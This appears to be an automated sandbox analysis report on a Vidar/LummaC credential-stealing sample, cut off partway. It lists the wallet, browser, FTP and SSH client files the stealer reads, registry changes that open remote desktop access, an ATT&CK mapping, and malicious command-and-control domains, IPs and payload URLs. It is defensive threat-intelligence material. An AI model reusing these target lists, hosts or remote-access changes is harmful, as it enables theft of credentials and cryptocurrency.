Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match	File source: 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1144, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2492023453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2361179215.0000000003485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 2.2.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3d45570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3d45570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1144, type: MEMORYSTR

Allows multiple concurrent remote connection

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Licensing Core EnableConcurrentSessions

Enables remote desktop connection

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fDenyTSConnections

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2D0C40 sqlite3_bind_zeroblob,	2_2_6C2D0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2D0D60 sqlite3_bind_parameter_name,	2_2_6C2D0D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1F8EA0 sqlite3_clear_bindings,	2_2_6C1F8EA0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 LSASS Driver	1 LSASS Driver	21 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	2 Remote Desktop Protocol	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	111 Deobfuscate/Decode Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	1 Create Account	2 Windows Service	41 Obfuscated Files or Information	Security Account Manager	5 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Windows Service	511 Process Injection	12 Software Packing	NTDS	56 System Information Discovery	Distributed Component Object Model	2 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	251 Security Software Discovery	SSH	Keylogging	124 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	23 Masquerading	DCSync	12 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	511 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\AFHDGDGIID.exe	100%	Avira	HEUR/AGEN.1311769
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5d9ab0d4c7_rdp[1].exe	100%	Avira	HEUR/AGEN.1311769
C:\ProgramData\AFHDGDGIID.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5d9ab0d4c7_rdp[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RDPWInst.exe	100%	Joe Sandbox ML
C:\Program Files\RDP Wrapper\rdpwrap.dll	54%	ReversingLabs	Win64.PUA.RDPWrapper
C:\ProgramData\GIIIIJDHJE.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66f5db9e54794_vfkagks[1].exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Temp\RDPWInst.exe	47%	ReversingLabs	Win32.PUA.RDPWrap
C:\Windows\System32\rfxvmt.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://www.gstatic.cn/recaptcha/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
http://www.entrust.net/rpa03	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	0%	URL Reputation	safe
https://help.steampowered.com/en/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/	0%	URL Reputation	safe
http://crl.entrust.net/ts1ca.crl0	0%	URL Reputation	safe
https://login.steampowered.com/	0%	URL Reputation	safe
https://store.steampowered.com/legal/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	0%	URL Reputation	safe
https://5.75.211.162/CGDHJEGHJ	100%	Avira URL Cloud	malware
http://aia.entrust.net/ts1-chain256.cer01	0%	URL Reputation	safe
https://store.steampowered.com/	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199780418869G	0%	Avira URL Cloud	safe
http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe1kkkk1220577http://147.45.44.104/prog/66f5db9e	100%	Avira URL Cloud	malware
https://5.75.211.162/V3	100%	Avira URL Cloud	malware
https://5.75.211.162/sqlp.dllI	100%	Avira URL Cloud	malware
stogeneratmns.shop	100%	Avira URL Cloud	malware
https://api.steampowered.com/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e	0%	Avira URL Cloud	safe
http://cowod.hopto.org_DEBUG.zip/c	0%	Avira URL Cloud	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	0%	Avira URL Cloud	safe
https://reinforcenh.shop/api	100%	Avira URL Cloud	malware
https://store.steampowered.com/mobile	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english	0%	URL Reputation	safe
https://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://5.75.211.162/vcruntime140.dll	100%	Avira URL Cloud	malware
https://5.75.211.162/sqlp.dllB	100%	Avira URL Cloud	malware
wallkedsleeoi.shop	100%	Avira URL Cloud	malware
https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0	0%	Avira URL Cloud	safe
https://5.75.211.162/sqlp.dllV	100%	Avira URL Cloud	malware
https://steamcommunity.com/profiles/76561199780418869.	100%	Avira URL Cloud	malware
https://fragnantbui.shop/	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP	0%	Avira URL Cloud	safe
https://s.ytimg.com;	0%	Avira URL Cloud	safe
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	0%	Avira URL Cloud	safe
https://stogeneratmns.shop/	100%	Avira URL Cloud	malware
fragnantbui.shop	100%	Avira URL Cloud	malware
http://cowod.hoptoFIEHJDB	0%	Avira URL Cloud	safe
http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe	100%	Avira URL Cloud	malware
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	0%	Avira URL Cloud	safe
offensivedzvju.shop	100%	Avira URL Cloud	malware
https://www.youtube.com/	0%	Avira URL Cloud	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	Avira URL Cloud	safe
https://www.google.com/recaptcha/	0%	Avira URL Cloud	safe
https://5.75.211.162AEBFC	0%	Avira URL Cloud	safe
https://stogeneratmns.shop/api1	100%	Avira URL Cloud	malware
https://5.75.211.162a	0%	Avira URL Cloud	safe
https://stogeneratmns.shop:443/api	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a	0%	Avira URL Cloud	safe
https://5.75.211.162/mozglue.dllX	100%	Avira URL Cloud	malware
https://steamcommunity.com/profiles/76561199780418869/inventory/	100%	Avira URL Cloud	malware
https://5.75.211.162/g	100%	Avira URL Cloud	malware
https://steamcommunity.com/profiles/76561199780418869	100%	Avira URL Cloud	malware
https://steamcommunity.com/L	0%	Avira URL Cloud	safe
https://drawzhotdog.shop:443/api:	100%	Avira URL Cloud	malware
http://147.45.44.104/prog/66f5db9e54794_vfkagks.exem-data;	100%	Avira URL Cloud	malware
https://fragnantbui.shop:443/api	100%	Avira URL Cloud	malware
https://5.75.211.162/:3#	100%	Avira URL Cloud	malware
https://5.75.211.162/freebl3.dlll	100%	Avira URL Cloud	malware
https://reinforcenh.shop/apiO	100%	Avira URL Cloud	malware
https://steamcommunity.com/I	0%	Avira URL Cloud	safe
https://steamcommunity.com/workshop/	0%	Avira URL Cloud	safe
http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exeata;	100%	Avira URL Cloud	malware
http://147.45.44.104	100%	Avira URL Cloud	malware
https://5.75.211.162/softokn3.dll	100%	Avira URL Cloud	malware
https://reinforcenh.shop/.itb	100%	Avira URL Cloud	malware
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU	0%	Avira URL Cloud	safe
https://stogeneratmns.shop/api	100%	Avira URL Cloud	malware
https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	0%	Avira URL Cloud	safe
http://hansgborn.eu	0%	Avira URL Cloud	safe
https://5.75.211.1620.5938.132	0%	Avira URL Cloud	safe
https://ghostreedmnu.shop/api	100%	Avira URL Cloud	malware
http://api.ipify.orgd	0%	Avira URL Cloud	safe
https://5.75.211.162/	100%	Avira URL Cloud	malware
http://cowod.hopto.org	0%	Avira URL Cloud	safe
http://hansgborn.eud	0%	Avira URL Cloud	safe
https://steamcommunity.com/?subsection=broadcasts	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
fragnantbui.shop	188.114.96.3	true	true	unknown
gutterydhowi.shop	104.21.4.136	true	true	unknown
cowod.hopto.org	45.132.206.251	true	true	unknown
offensivedzvju.shop	188.114.96.3	true	true	unknown
drawzhotdog.shop	172.67.162.108	true	true	unknown
ghostreedmnu.shop	188.114.97.3	true	true	unknown
ballotnwu.site	172.67.128.144	true	true	unknown
wallkedsleeoi.shop	104.21.36.139	true	true	unknown
hansgborn.eu	188.114.96.3	true	true	unknown
steamcommunity.com	104.102.49.254	true	true	unknown
stogeneratmns.shop	188.114.97.3	true	true	unknown
reinforcenh.shop	172.67.208.139	true	true	unknown
api.ipify.org	104.26.13.205	true	false	unknown
vozmeatillu.shop	188.114.97.3	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
stogeneratmns.shop	true	Avira URL Cloud: malware	unknown
https://reinforcenh.shop/api	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
wallkedsleeoi.shop	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
fragnantbui.shop	true	Avira URL Cloud: malware	unknown
http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe	false	Avira URL Cloud: malware	unknown
offensivedzvju.shop	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199780418869	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/softokn3.dll	true	Avira URL Cloud: malware	unknown
https://stogeneratmns.shop/api	true	Avira URL Cloud: malware	unknown
https://ghostreedmnu.shop/api	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	IDHIEB.2.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	IDHIEB.2.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199780418869G	RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/CGDHJEGHJ	RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/V3	RegAsm.exe, 0000000B.00000002.2823050611.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, CBAKJE.2.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	false	Avira URL Cloud: safe	unknown
https://www.gstatic.cn/recaptcha/	RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe1kkkk1220577http://147.45.44.104/prog/66f5db9e	RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 